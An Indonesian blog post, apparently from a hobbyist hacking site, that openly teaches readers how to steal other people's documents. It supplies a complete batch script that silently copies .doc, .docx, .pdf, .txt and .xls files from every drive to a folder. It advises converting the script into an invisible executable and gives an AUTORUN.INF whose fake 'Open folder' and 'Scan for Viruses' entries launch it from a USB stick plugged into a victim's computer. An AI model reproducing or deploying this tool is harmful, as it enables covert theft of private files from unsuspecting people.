ngembat DATA PENTING

Posted on 07:24, under

buat para maniac yang kepingin ngambil document2x penting milik orang lain nich Ada scrip bat yang dapat membantu kalian buat nyedotin document penting ……….
Copy paste script dibawah dengan notepad :

-------------------------mulai---------------------------
@echo off
title silentxxx
color c
cls
REM Name : silentxxx
REM Author : silent

Set silent=%computername%_%random%

If not exist "%silent%" Md "%silent%"

For %%a in (D E F G H I J) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.doc') do (
attrib -s -h -r "%%b"
copy "%%b" "%silent%" /y)
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.docx') do (
attrib -s -h -r "%%b"
copy "%%b" "%silent%" /y)
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.txt') do (
attrib -s -h -r "%%b"
copy "%%b" "%silent%" /y)
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.pdf') do (
attrib -s -h -r "%%b"
copy "%%b" "%silent%" /y)
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.pdp') do (
attrib -s -h -r "%%b"
copy "%%b" "%silent%" /y)
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.pdp') do (
attrib -s -h -r "%%b"
copy "%%b" "%silent%" /y)
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.xls') do (
attrib -s -h -r "%%b"
copy "%%b" "%silent%" /y)
)

-----------------selesai--------------------------------


Kalau sudah simpan dengan nama terserah.bat dan save as type “all files”….
Script di atas akan mengambil *.docx,doc,pdf,txt,pdp,xls, tambahin aja dengan keperluan kalian ,
Dengan nambahin scrip

For %%a in (D E F G H I J) do if exist %%a:\ (
For /f "tokens=*" %%b in ('dir /a /b /s %%a:\*.doc') do (
attrib -s -h -r "%%b"
copy "%%b" "%silent%" /y)

dan mengganti \*.doc') menjadi keperluan , kalian misalnya \*.exe’) Dsb….

Bagusnya scripnya di jadi’in file “exe” Dengan Battoexe.exe download di http://www.brothersoft.com/bat-to-exe-converter-50301.html
Dan pada “Visibillity” nya dig anti dengan “invisible application” agar berjalan secara diam dan tak menampilkan layar CMD nya….

Dan bagusnya lagi kalau kita buat AUTORUN.INF agar dapat berjalan secara langsung dari flashdisk,
sekali colok hamillah tu fd ma data2 orang..
Kalau belum ada yang tau cara bikin nya Copy paste pada notepad :

[autorun]
open=terserah.exe
shellexecute=terserah.exe
action=Open folder to view files
shell\Explore\command=terserah.exe
shell\Open\command=terserah.exe
shell\Scan for Viruses...\command=terserah.exe

klo lum diubah jadi .bat tinggal ganti ja script diatas..
shell code diatas gunanya buat ngejalanin program yg qt bikin td jg..
jadi,
klo qt klick kanan di fd terus klik Explore/open/sacan blabla tu malah ngejalanin tu program sedot2..


sallam super..

| edit post

0 Reply to "ngembat DATA PENTING"

  • Poskan Komentar